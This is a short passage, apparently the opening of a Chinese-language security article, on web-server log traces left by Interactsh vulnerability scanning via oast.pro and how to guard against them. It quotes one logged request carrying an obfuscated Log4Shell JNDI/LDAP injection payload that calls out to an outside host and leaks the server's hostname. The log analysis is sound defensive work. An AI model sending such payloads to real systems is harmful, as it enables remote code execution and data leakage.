与Interactsh检测漏洞工具相关的oast.pro日志特征及安全防范
一、经分析web服务器,出现以下日志:114.236.1.125 - [-] [2023-06-14T07:07:08+08:00] "[-] [www.a.com] GET /?x=${jndi:ldap://${:-957}${:-583}.${hostName}.uri.ci42e559mpo23m5krkj01uiiwd7tn7rby.oast.pro/a} HTTP/1.1" 200 [Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrom